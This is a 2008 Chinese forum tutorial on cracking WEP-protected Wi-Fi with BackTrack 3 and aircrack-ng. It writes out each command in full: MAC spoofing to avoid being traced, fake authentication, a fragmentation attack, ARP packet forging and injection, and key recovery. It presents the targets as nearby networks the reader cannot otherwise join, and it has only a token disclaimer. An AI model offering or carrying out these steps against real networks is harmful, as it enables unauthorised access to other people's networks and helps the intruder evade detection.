|
首先申明本人不是黑客,出于兴趣爱好和交朋识友才发此贴,此贴仅用于交流使用.图片内容并非都是出自本人原创,本人只是借来编辑了一下........
好了,开始了........
破解之前首先你要准备以下东西:
a.一张刻录好的用于破解的光盘或者能够启动BT3的其他介质或虚拟机,用于破解的软件有很多,个人推荐使用BT3.下载地址购买本贴后即可显示。
b.一台用于破解的电脑,最好是笔记本,能够运行本教程使用的光盘的笔记本见楼下。
c.支持破解的网卡一个,如果你的笔记本自带的网卡不支持,你可以去买一个或者借一个列表(见4楼)中的usb网卡。
由于部分图片不能显示,要word格式或者PDF格式的朋友给我发站内消息留下信箱 准备工作
下载BT3用刻录软件将iso文件写入光盘,下载地址如下
Description: CD Image
Size: ~ 700 MB
MD5: 04ed8742fc8facd1ecc8c9f6f567c116
SHA: 70c33e0aa75a978b8a87a207bf488ecec8d10a87
Mirrors:
ftp://ftp.heanet.ie/mirrors/backtrack/bt3b141207.iso
ftp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.iso
http://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.isoftp://ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3b141207.isohttp://backtrack.mirrors.skynet.be/pub/backtrack/bt3b141207.iso
http://mirror.switch.ch/ftp/mirror/backtrack/bt3b141207.iso
http://ftp.belnet.be/mirror/backtrack/bt3b141207.iso
http://backtrack.unixheads.org/
http://devsn.org/mirror/backtrack3/bt3b141207.iso
http://ftp.heanet.ie/mirrors/backtrack/bt3b141207.iso
Torrent: http://www.remote-exploit.org/bt3b141207.iso.torrent
实验方案
1.设置无线网卡MAC地址。
2.用airmon-ng让网卡进入monitor 模式
3.用airodump-ng找到你要破解的无线网络的Essid,bssid and channel.
4.重新让你的网卡进入monitor 模式,只监视你要破解的无线网络所用的channel.
5使用aireplay-ng在实验AP上产生虚假认证( fake authentication)。
6.使用fragmentation attack来获得PRGA。
7.使用上一步获得的PRGA用packetforge-ng 工具来生成一个arp包。
8.再次用airodump-ng来收集需要的IVS数据
9.使用第7步得到的arp来注入攻击
10.用aircrack-ng破解
详细步骤
把光盘放入光驱,重新启动电脑,选择从光驱启动,进入bt3的环境,这步你该会吧。
1.设置无线网卡MAC地址
1.1 打开一个shell(在窗口左下角),输入如下命令ifconfig -a,结果见下图
其中rausb0是我的无线网卡名,也许你的是wifi0,后面的命令不能照搬,记得换名字,在后面步骤中我用 你的网卡名 代替 rausb0
1.2 输入命令macchanger -m 00:11:22:33:44:55 rausb0把无线网卡mac地址改成00:11:22:33:44:55,因为后面经常要用到,这个方便输入,而且是个虚假地址,就算被记录也没问题 :)
2.用airmon-ng让网卡进入monitor 模式
2.1输入命令 ifconfig -a 你的网卡名 up ,加载你的无线网卡
2.2输入命令 airmon-ng start 你的网卡名 ,让你的网卡进入monitor模式
3.用airodump-ng找到你要破解的无线网络的Essid,bssid and channel.
重新开第二个shell窗口,输入命令 airodump-ng -w capture 你的网卡名 ,其中capture 为抓包文件名,你可以任意指定,后面我用 抓包文件名 来代替。
你得到的图片应该与下面相似。注意图中的注释哦,后面会出现许多次 要破解的ESSID 对应的BSSID 对应的Channel ,你要知道该在这里找!我想这里的ESSID你应该很熟悉吧?对了!它就是你在windows底下能看到的无线网络名,看到千百次却无法连上的,记得挑一个信号强的哦.
4.重新让你的网卡进入monitor 模式,只监视你要破解的无线网络所用的channel.
4.1输入命令 airmon-ng stop 你的网卡名 ,先让你的无线网卡退出monitor模式
4.2输入命令 ifconfig -a 你的网卡名 up ,重新加载你的网卡
4.3输入命名 airmon-ng start 你的网卡名 对应的频道 ,让网卡只监听你要破解的网络eg对应的频道
5.使用aireplay-ng在实验AP上产生虚假认证( fake authentication)
开第三个shell,输入命令
aireplay-ng -1 0 -e 要破解的ESSID -a 对应的BSSID -h 00:11:22:33:44: 55 你的网卡名
当你得到"Assoocation successful" ,表明你虚假认证成功.如下图
6.使用fragmentation attack来获得PRGA。
在第三个shell窗口中如入如下命令
aireplay-ng -5 -b 对应的BSSID -h 00:11:22:33:44: 55 你的网卡名 或者
aireplay-ng -4 -b 对应的BSSID -h 00:11:22:33:44: 55 你的网卡名
这一步的目的是获得一个xor文件,如果顺利,你将看到如下图片
输入"Y",回车
如果你用的是aireplay-ng -5,你将看到如下图片
如果你用的是aireplay-ng -4,你看到的图片将不同,但是等100%guess 完成之后,你能看到"saving keystream......",一样表示你这一步成功了.
7.使用上一步获得的PRGA用packetforge-ng 工具来生成一个arp包。
7.1输入 ls ,可以看到Xor文件名,很长,记得别敲错,建议用复制,粘贴到7.2的命令中
你将看到类似如下的图片
7.2 输入如下命令生成一个用来ARP攻击的文件.
packetforge-ng -0 -a 对应的BSSID -h 00:11:22:33:44: 55 -k 255.255.255.255 -l 255.255.255.255 -y 7.1中看到的文件名(包括后缀XOR) -w ARP文件名
其中ARP文件名可以任意指定,我一般就叫arp,后面第9步中要用到这个文件的.
请参考下图
8.再次用airodump-ng来收集需要的IVS数据
在第二个shell窗口中输入 airodump-ng -c 对应的频道 --bssid 对应的BSSID -w 抓包文件 你的网卡名 ,开始抓包.注意bssid前面有两个"-" .
9.使用第7步得到的arp来注入攻击
在第3个shell窗口中输入如下命令 aireplay-ng -2 –r ARP文件名 你的网卡名
你将看到类似如下的画面
输入 "Y",回车,发包攻击开始,如下图
回到第二个shell窗口,如果你看到抓到的DATA每秒速度有几十甚至接近500的时候,去喝杯咖啡等着抓包到30万吧.
10.用aircrack-ng破解
等到抓包到30万(其实12万就可以了,抓的破解的就快),按下 CTRL + C 停止抓包,
输入命令 ls 察看你的抓包文件名,一般应该是在第8步中的"抓包文件"后面加上"-01.cap"或者"-02.cap",例如 "capture-01.cap"
接着输入命令 aircrack-ng -z 抓包文件名-01.cap 或者
aircrack-ng -x 抓包文件名-01.cap 就可以破译出密码了!
如下图
需要注意的是,如果你得不到ASCII码 你把得到的16进制码(类似图中的"63:6A:63:68...")中间的分号去掉,一样可以当密码输入.
-------------------------------------------------------- [ 本帖最后由 nobestname 于 2008-7-8 11:52 编辑 ] |
评分
-
查看全部评分
|